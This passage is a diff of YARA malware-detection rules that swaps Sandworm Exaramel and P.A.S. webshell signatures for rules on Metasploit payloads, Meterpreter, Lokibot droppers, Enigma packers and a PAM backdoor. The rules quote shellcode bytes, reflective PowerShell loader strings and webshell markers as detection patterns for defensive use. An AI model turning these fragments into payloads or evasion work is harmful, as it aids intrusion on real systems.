-		logic_hash = "3c9a4f5aca4c9fc26d371027a32e349a456ef25d6b403a66b9afb1ee19dd4d00"
+		logic_hash = "c772fdc40e110ef1287da680dc4ef1718b86856abab4d814ec7bc2ee1e7808ee"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3cd74fa28323c0d64f45507675ac08fb09bae4dd6b7e11f2832a4fbc70bb7082"
 
 	strings:
-		$x1 = "E:\\Projects\\m_project\\main\\mj shoaib"
-		$s1 = "\\obj\\x86\\Debug\\secure_scan.pdb" ascii
-		$s2 = "secure_scan.exe" fullword wide
-		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|mswall" fullword wide
-		$s4 = "secure_scan|mswall" fullword wide
-		$s5 = "[Microsoft-Security-Essentials]" fullword wide
+		$s1 = { 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff ac 3c 61 }
+		$s2 = { 01 c7 38 e0 75 f6 03 7d f8 3b 7d 24 75 e4 58 8b }
+		$s3 = { 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 5f 5f }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and $x1 ) or ( all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_SUSP_Nullsoftinst_Combo_Oct20_1 : FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_Svc : FILE
 {
 	meta:
-		description = "Detects suspicious NullSoft Installer combination with common Copyright strings"
+		description = "Metasploit Payloads - file msf-svc.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "380f30a6-df6b-50c6-bb2d-b8785564bbac"
-		date = "2020-10-06"
+		id = "45d1c527-1f90-50f3-8e64-e77d69386b0a"
+		date = "2017-02-09"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/malwrhunterteam/status/1313023627177193472"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_anomalies_keyword_combos.yar#L2-L33"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L271-L285"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8aef24295281da5ffa1c6f865eaa6cc8d60ea1df670058220bdb97651b6114cd"
-		score = 65
+		logic_hash = "21c6aa2333335a5822328fb5176ca37060eb401640ed5cc340aefb63685078f4"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "686b5240e5e503528cc5ac8d764883413a260716dd290f114a60af873ee6a65f"
-		hash2 = "93951379e57e4f159bb62fd7dd563d1ac2f3f23c80ba89f2da2e395b8a647dcf"
-		hash3 = "a9ca1d6a981ccc8d8b144f337c259891a67eb6b85ee41b03699baacf4aae9a78"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2b02c9c10577ee0c7590d3dadc525c494122747a628a7bf714879b8e94ae5ea1"
 
 	strings:
-		$a1 = "NullsoftInst" ascii
-		$b1 = "Microsoft Corporation" wide fullword
-		$b2 = "Apache Software Foundation" ascii wide fullword
-		$b3 = "Simon Tatham" wide fullword
-		$fp1 = "nsisinstall" fullword ascii
-		$fp2 = "\\REGISTRY\\MACHINE\\Software\\" wide
-		$fp3 = "Apache Tomcat" wide fullword
-		$fp4 = "Bot Framework Emulator" wide fullword
-		$fp5 = "Firefox Helper" wide fullword
-		$fp6 = "Paint.NET Setup" wide fullword
-		$fp7 = "Microsoft .NET Services Installation Utility" wide fullword
-		$fp8 = "License: MPL 2" wide
+		$s1 = "PAYLOAD:" fullword ascii
+		$s2 = ".exehll" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and $a1 and 1 of ( $b* ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PAS_Webshell : FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_11
 {
 	meta:
-		description = "Detects P.A.S. PHP webshell - Based on DHS/FBI JAR-16-2029 (Grizzly  Steppe)"
-		author = "FR/ANSSI/SDO (modified by Florian Roth)"
-		id = "862aab77-936e-524c-8669-4f48730f4ed5"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L10-L28"
+		description = "Metasploit Payloads - file msf.hta"
+		author = "Florian Roth (Nextron Systems)"
+		id = "59b0cced-ffdc-5f2f-878c-856883ee275f"
+		date = "2017-02-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L287-L302"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "977ee0fdf0e92ccea6b71fea7b2c7aed2965c6966d8af86230ccb0f95b286694"
-		score = 70
-		quality = 85
-		tags = "FILE"
+		logic_hash = "f003989a99315b42c0c73beaa2928d0187fe92a4bf329912d64fac9f8fc9358c"
+		score = 75
+		quality = 83
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d1daf7bc41580322333a893133d103f7d67f5cd8a3e0f919471061d41cf710b6"
 
 	strings:
-		$php = "<?php"
-		$strreplace = "(str_replace("
-		$md5 = ".substr(md5(strrev($"
-		$gzinflate = "gzinflate"
-		$cookie = "_COOKIE"
-		$isset = "isset"
+		$s1 = ".ExpandEnvironmentStrings(\"%PSModulePath%\") + \"..\\powershell.exe\") Then" fullword ascii
+		$s2 = "= CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+		$s3 = "= CreateObject(\"Wscript.Shell\") " fullword ascii
 
 	condition:
-		( filesize > 20KB and filesize < 200KB ) and all of them
+		all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PAS_Webshell_Ziparchivefile
+rule SIGNATURE_BASE_Msfpayloads_Msf_Ref
 {
 	meta:
-		description = "Detects an archive file created by P.A.S. for download operation"
-		author = "FR/ANSSI/SDO (modified by Florian Roth)"
-		id = "081cc65b-e51c-59fc-a518-cd986e8ee2f7"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L30-L42"
+		description = "Metasploit Payloads - file msf-ref.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "517ed365-03c6-5563-984b-dae10464671a"
+		date = "2017-02-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L304-L323"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c15e7022f45ec211ba635d6cd31bab16f4fb0d3038fb19d5765e0f751c14a826"
-		score = 80
+		logic_hash = "ed6e408575b88ff67479ac1b1a2f37c5fad3ec200a446700840ad4245386bfc4"
+		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87"
 
 	strings:
-		$s1 = "Archive created by P.A.S. v."
+		$s1 = "kernel32.dll WaitForSingleObject)," ascii
+		$s2 = "= ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')" ascii
+		$s3 = "GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object" ascii
+		$s4 = ".DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual'," ascii
+		$s5 = "= [System.Convert]::FromBase64String(" ascii
+		$s6 = "[Parameter(Position = 0, Mandatory = $True)] [Type[]]" fullword ascii
+		$s7 = "DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard," ascii
 
 	condition:
-		$s1
+		5 of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PAS_Webshell_Perlnetworkscript : FILE
+rule SIGNATURE_BASE_MAL_Metasploit_Framework_UA : FILE
 {
 	meta:
-		description = "Detects PERL scripts created by P.A.S. webshell"
-		author = "FR/ANSSI/SDO"
-		id = "1625b63f-ead7-5712-92b4-0ce6ecc49fd4"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L44-L62"
+		description = "Detects User Agent used in Metasploit Framework"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e5a18456-3a07-5b58-ad95-086152298a1f"
+		date = "2018-08-16"
+		modified = "2023-12-05"
+		reference = "https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L325-L339"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b170c07a005e737c8069f2cc63f869d4d3ff6593b3bfca5bcaf02d7808da6852"
-		score = 90
+		logic_hash = "986fea99735b93aed9dbf72582c009e11a1e7ba19b256902f93312474ef34b4a"
+		score = 65
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1743e1bd4176ffb62a1a0503a0d76033752f8bd34f6f09db85c2979c04bbdd29"
 
 	strings:
-		$pl_start = "#!/usr/bin/perl\n$SIG{'CHLD'}='IGNORE'; use IO::Socket; use FileHandle;"
-		$pl_status = "$o=\" [OK]\";$e=\" Error: \""
-		$pl_socket = "socket(SOCKET, PF_INET, SOCK_STREAM,$tcp) or die print \"$l$e$!$l"
-		$msg1 = "print \"$l OK! I\\'m successful connected.$l\""
-		$msg2 = "print \"$l OK! I\\'m accept connection.$l\""
+		$s3 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)" fullword ascii
 
 	condition:
-		filesize < 6000 and ( $pl_start at 0 and all of ( $pl* ) ) or any of ( $msg* )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PAS_Webshell_Sqldumpfile
+rule SIGNATURE_BASE_HKTL_Meterpreter_Inmemory
 {
 	meta:
-		description = "Detects SQL dump file created by P.A.S. webshell"
-		author = "FR/ANSSI/SDO"
-		id = "4c26feeb-3031-5c91-9eeb-4b5fe9702e39"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L64-L76"
+		description = "Detects Meterpreter in-memory"
+		author = "netbiosX, Florian Roth"
+		id = "29c3bb7e-4da8-5924-ada7-2f28d9352009"
+		date = "2020-06-29"
+		modified = "2023-04-21"
+		reference = "https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L341-L363"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c34abcada22fdf462fd66cc2da18ab9e54215defc6f7a7a95b5a80d1155a2ffe"
-		score = 90
+		logic_hash = "4b39dbcb276842a1306205cf2e51ce86b6d2aa21353d277df15f4ea3b3d97678"
+		score = 85
 		quality = 85
 		tags = ""
 
 	strings:
-		$ = "-- [ SQL Dump created by P.A.S. ] --"
+		$sxc1 = { 6D 65 74 73 72 76 2E 64 6C 6C 00 00 52 65 66 6C
+               65 63 74 69 76 65 4C 6F 61 64 65 72 }
+		$sxs1 = "metsrv.x64.dll" ascii fullword
+		$ss1 = "WS2_32.dll" ascii fullword
+		$ss2 = "ReflectiveLoader" ascii fullword
+		$fp1 = "SentinelOne" ascii wide
+		$fp2 = "fortiESNAC" ascii wide
+		$fp3 = "PSNMVHookMS" ascii wide
 
 	condition:
-		1 of them
+		(1 of ( $sx* ) or 2 of ( $s* ) ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Configuration_Key
+rule SIGNATURE_BASE_EXPL_Zoho_RCE_Fix_Lines_Dec21_1 : FILE
 {
 	meta:
-		description = "Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...]"
-		author = "FR/ANSSI/SDO"
-		id = "8078de62-3dd2-5ee0-8bda-f508e4013144"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L78-L90"
+		description = "Detects lines in log lines of Zoho products that indicate RCE fixes (silent removal of evidence)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "633287e3-a377-5b3c-8520-a7790168eff5"
+		date = "2021-12-06"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/cyb3rops/status/1467784104930385923"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_zoho_rcef_logs.yar#L2-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "056503a2c240a641cd2292a30ab1090e3a358cb4d57dca83b836ecb1bc62ed6b"
-		score = 80
+		logic_hash = "e6d9c3364da57c03a5e838f485deefabec2f3ec67d19a9017e564ba702a72d03"
+		score = 65
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$ = "odhyrfjcnfkdtslt"
+		$s1 = "RCEF="
+		$sa1 = "\"attackStatus\"\\:\"active\""
+		$sa2 = "\"attackStatus\":\"active\""
+		$sd1 = "deletedCount"
+		$sd_fp1 = "\"deletedCount\"\\:0"
+		$sd_fp2 = "\"deletedCount\":0"
 
 	condition:
-		all of them
+		filesize < 6MB and $s1 and ( 1 of ( $sa* ) or ( $sd1 and not 1 of ( $sd_fp* ) ) )
 }
-rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Configuration_Name_Encrypted
+rule SIGNATURE_BASE_Generic_Dropper : FILE
 {
 	meta:
-		description = "Detects the specific name of the configuration file in Exaramel malware as seen in sample e1ff72[...]"
-		author = "FR/ANSSI/SDO"
-		id = "1c06f5fc-3435-51cd-92fb-17a4ab6b63ad"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L92-L104"
+		description = "Detects Dropper PDB string in file"
+		author = "Florian Roth (Nextron Systems)"
+		id = "60ce6a5c-2e12-515b-b8cb-8c87500cb37b"
+		date = "2018-03-03"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/JAHZVL"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_dropper_pdb.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f65d59381403534a2c2f39d66c7c62bf1540eafc9aad1ad73de1809e91c42446"
-		score = 80
+		logic_hash = "e4ef83796d232edf34a6339e00db486612a88ff2d054f1afcd524def2e53b3b7"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "configtx.json"
+		$s1 = "\\Release\\Dropper.pdb"
+		$s2 = "\\Release\\dropper.pdb"
+		$s3 = "\\Debug\\Dropper.pdb"
+		$s4 = "\\Debug\\dropper.pdb"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Configuration_File_Plaintext
+rule SIGNATURE_BASE_Enigmapacker_Rare : FILE
 {
 	meta:
-		description = "Detects contents of the configuration file used by Exaramel (plaintext)"
-		author = "FR/ANSSI/SDO"
-		id = "6f0d834b-e6c8-59e6-bf9a-b4fd9c0b2297"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L106-L118"
+		description = "Detects an ENIGMA packed executable"
+		author = "Florian Roth (Nextron Systems)"
+		id = "748bc74c-e83f-5740-8ff7-f1371fc22802"
+		date = "2017-04-27"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_enigma_protector.yar#L8-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "536327d5216372a3fd2f4dad0a21be2778ce2930212daf0a8628ecbdab49b46e"
-		score = 80
-		quality = 60
-		tags = ""
+		logic_hash = "a001b563db1b75581432d42a435683f24e244b6b354f83409b5b9d6d0314d63a"
+		score = 60
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "77be6e80a4cfecaf50d94ee35ddc786ba1374f9fe50546f1a3382883cb14cec9"
 
 	strings:
-		$ = /\{"Hosts":\[".{10,512}"\],"Proxy":".{0,512}","Version":".{1,32}","Guid":"/
+		$s1 = "P.rel$oc$" fullword ascii
+		$s2 = "ENIGMA" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them )
 }
-rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Configuration_File_Ciphertext
+rule SIGNATURE_BASE_Enigma_Protected_Malware_May17_Rhxfiles : FILE
 {
 	meta:
-		description = "Detects contents of the configuration file used by Exaramel (encrypted with key odhyrfjcnfkdtslt, sample e1ff72[...]"
-		author = "FR/ANSSI/SDO"
-		id = "763dbb17-2bad-5b40-8a7b-b71bc5849cd9"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L120-L132"
+		description = "Auto-generated rule - file RhxFiles.dll"
+		author = "Florian Roth (Nextron Systems) with the help of binar.ly"
+		id = "d701d591-4283-5645-8768-a5ab7df0f37a"
+		date = "2017-05-02"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_enigma_protector.yar#L25-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9dc7ee5b0a218a2b5be652e137fa090c944c3ddb0f699f521a72896668210813"
-		score = 80
+		logic_hash = "838ab7dddda798d2f5c79fc5417693f8489195b3024c43d9ad1aab05fcfd71eb"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "2187d6bd1794bf7b6199962d8a8677f19e4382a124c30933d01aba93cc1f0f15"
 
 	strings:
-		$ = { 6F B6 08 E9 A3 0C 8D 5E DD BE D4 }
+		$op1 = { bd 9c 74 f6 7a 3a f7 94 c5 7d 7c 7c 7c 7e ae 73 }
+		$op2 = { 82 62 6b 6b 6b 68 a5 ea aa 69 6b 6b 6b 3a 3b 94 }
+		$op3 = { 7c 7c c5 7d 7c 7c 7c 7e ae 73 f9 79 7c 7c 7c f6 }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them )
 }
-rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Socket_Path
+rule SIGNATURE_BASE_Enigma_Protected_Malware : FILE
 {
 	meta:
-		description = "Detects path of the unix socket created to prevent concurrent executions in Exaramel malware"
-		author = "FR/ANSSI/SDO"
-		id = "3aab84c9-9748-5d11-9cd7-efa9151036cf"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L134-L146"
+		description = "Detects samples packed by Enigma Protector"
+		author = "Florian Roth (Nextron Systems) with the help of binar.ly"
+		id = "d701d591-4283-5645-8768-a5ab7df0f37a"
+		date = "2017-02-03"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/OEVQ9w"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_enigma_protector.yar#L41-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8c049b5a7b508ca0f160d166f3c726e4a23a2c5b3105d075d7bf7a301a1c58f6"
-		score = 80
+		logic_hash = "1a254d4d593b73d16d1cfbd73d7d4b2732a080cb98d70972de0826433b004152"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "d4616f9706403a0d5a2f9a8726230a4693e4c95c58df5c753ccc684f1d3542e2"
 
 	strings:
-		$ = "/tmp/.applocktx"
+		$s1 = { 5d 5d 5d aa bf 5e 95 d6 dc 51 5d 5d 5d 5e 98 0d }
+		$s2 = { 52 d9 47 5d 5d 5d dd a6 b4 52 d9 4c 5d 5d 5d 3b }
+		$s3 = { 9f 59 14 52 d8 a9 a2 a2 a2 00 9f 51 5d d6 d1 79 }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Task_Names
+rule SIGNATURE_BASE_Lokibot_Dropper_Scancopypdf_Feb18 : FILE
 {
 	meta:
-		description = "Detects names of the tasks received from the CC server in Exaramel malware"
-		author = "FR/ANSSI/SDO"
-		id = "185f2f3b-bf5c-54af-bca2-400d08bf9c91"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L148-L167"
+		description = "Auto-generated rule - file Scan Copy.pdf.com"
+		author = "Florian Roth (Nextron Systems)"
+		id = "64c45d91-4e18-5fd1-8d93-b5db4df7da29"
+		date = "2018-02-14"
+		modified = "2023-12-05"
+		reference = "https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_loki_bot.yar#L11-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "193482da1e2b9509fa9c65d46edc56057f7b5d44b7408d918d4a9cbb60736dab"
-		score = 80
+		logic_hash = "b9f10a09d91c10731e34dc88f87104693cdc794ddc3c63ee382f976d0a75f30f"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6f8ff26a5daf47effdea5795cdadfff9265c93a0ebca0ce5a4144712f8cab5be"
 
 	strings:
-		$ = "App.Delete"
-		$ = "App.SetServer"
-		$ = "App.SetProxy"
-		$ = "App.SetTimeout"
-		$ = "App.Update"
-		$ = "IO.ReadFile"
-		$ = "IO.WriteFile"
-		$ = "OS.ShellExecute"
+		$x1 = "Win32           Scan Copy.pdf   " fullword wide
+		$a1 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword ascii
+		$s1 = "Compiling2.exe" fullword wide
+		$s2 = "Unstalled2" fullword ascii
+		$s3 = "Compiling.exe" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and $x1 or ( $a1 and 1 of ( $s* ) )
 }
-rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Struct
+rule SIGNATURE_BASE_Lokibot_Dropper_Packed_R11_Feb18 : FILE
 {
 	meta:
-		description = "Detects the beginning of type _type struct for some of the most important structs in Exaramel malware"
-		author = "FR/ANSSI/SDO"
-		id = "8282e485-966c-554d-8e41-70dc1657f5ea"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L169-L185"
+		description = "Auto-generated rule - file scan copy.pdf.r11"
+		author = "Florian Roth (Nextron Systems)"
+		id = "83cd6225-eb6d-5d17-a751-51f20db9c7eb"
+		date = "2018-02-14"
+		modified = "2023-12-05"
+		reference = "https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_loki_bot.yar#L33-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "312d0598fa85837f94023036468fcae50e8b2de532430a944befa8090afe79f6"
-		score = 80
+		logic_hash = "9ca39cac8dcbbbe1697ef96bde60c522bb9cc190c208483220aa96bc672f325a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029"
 
 	strings:
-		$struct_le_config = {70 00 00 00 00 00 00 00 58 00 00 00 00 00 00 00 47 2d 28 42 0? [2] 19}
-		$struct_le_worker = {30 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 46 6a 13 e2 0? [2] 19}
-		$struct_le_client = {20 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 7b 6a 49 84 0? [2] 19}
-		$struct_le_report = {30 00 00 00 00 00 00 00 28 00 00 00 00 00 00 00 bf 35 0d f9 0? [2] 19}
-		$struct_le_task = {50 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 88 60 a1 c5 0? [2] 19}
+		$s1 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x0000 and filesize < 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Strings_Typo
+rule SIGNATURE_BASE_MAL_UNC2891_Slapstick : FILE
 {
 	meta:
-		description = "Detects misc strings in Exaramel malware with typos"
-		author = "FR/ANSSI/SDO"
-		id = "fdc79b87-eb9e-5751-9474-ff653b073165"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L187-L202"
+		description = "Detects UNC2891 Slapstick pam backdoor"
+		author = "Frank Boldewin (@r3c0nst), slightly modifier by Florian Roth"
+		id = "eb5db507-ac12-5c11-9dd9-ec34b9a80e1c"
+		date = "2022-03-30"
+		modified = "2023-01-05"
+		reference = "https://github.com/fboldewin/YARA-rules/tree/master"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc2891_mal_jan23.yar#L19-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "65e6de743eb9fc742674c7e54eef8a376963a6fd4380bacd03fe6f92d4235920"
-		score = 80
+		logic_hash = "4bc51a47a1b620c3bb950c287c38a37e528e79f9720fb4d9fa9ebecbeca82036"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
